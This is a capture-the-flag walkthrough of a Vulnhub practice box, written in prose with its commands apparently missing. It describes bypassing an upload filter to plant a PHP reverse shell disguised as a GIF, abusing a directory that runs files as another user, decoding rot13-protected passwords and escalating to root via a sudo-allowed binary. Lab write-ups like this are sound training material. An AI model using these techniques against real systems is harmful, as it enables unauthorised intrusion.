Vulnhub virtual machine; OSCP prep box, and a very interesting one indeed. This box included a few hints and clues sprinkled around a web application which then pivoted to multiple user escalations along side decryption of cipher-text which led to eventual root.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.
By continued reading, you acknowledge the aforementioned user risk/responsibilities.
Initial Setup Note: When booting this VM ensure you virtualization software uses the MAC address
08:00:27:A5:A6:76 I probably spent way more time then I’d like to admit troubleshooting networking issues then I really should have. #fundamentalsofreading
Discover VM on network:
robots.txt looks to have some interesting directories disallowed
Navigate to webserver:
Not my favorite color but we have a list of user names and a date of 2015.
Might be helpful in the future.
First clue, as we are to achieve root and box estimates 4hrs to complete.
Investigate robot.txt disallowed directories http://192.168.56.109/cola
Download locally to investigate for stenography
Nothing such as .zip or anything is standing out as of now.
/beer/ both contain links to the same image.
Thinking all these directories have some type of drink in the name and we were told to “keep calm and drink fristi” maybe a
/fristi/ directory exists.
attempt basic logins admin/admin, root/password… etc first.
Met with a whole lot of “wrong username or password”
Content filtering is occurring, good job webadmin.
well hello base64 encoded image.
Decode base64: create file with base64
File has a header of PNG. lets pipe this decode into a png file
Well this is turning into a bit of a Drake “keke” song.
image resolves to
eezeepz was the one that left the message let try to login
We are in like fine swimwear! and upload file based off php lets try and upload a reverse shell.
attempt to upload shell.php
we will need to disquise our shell as an image.
Made modifications to file name, content-type and added GIF89a;
File filer bypassed and uploaded to
Ensure listener is setup
upgrade partial shell to full tty Python method:
Start the quest to enumerate and elevate privileges on box.
search for vulnerabilities based off the 2.6.32 kernel
looks like we found some priv esc code. — anddddd this has turned out not to be helpful.
Running my enum scripts:
Interesting avenues to take.
Continue Enumerating User Home directories: Found in eezeepz a note.txt
Jerry left this not to add files to /tmp/run that get run as his account.
Lets input a reverse shell into the directory and see if we can elevate our privileges to jerry.
Made modifications needed.
Setup new listener on 9001
download script to
Append the perl script to a new file name
We are now Admin
import new tty
as in our previous encounter the home directory aided in our escalation as to now investigate
Interesting files exist here
Cat interesting files:
seems to be encoded in rot13 based off the python script.
Reconstructing the cryptpass.py to decode
run the scripts
we now have plain-text passwords.
Utilizing password to
su to fristigod
sudo -l to see what fristi god is capable of doing:
we have a
*.secret_admin_stuff/doCom* file which looks very interesting.
we see a lot of movement pertaining to a user
Attempt to run the doCom as
doCom as usage indicates but calling
Bring me the Root!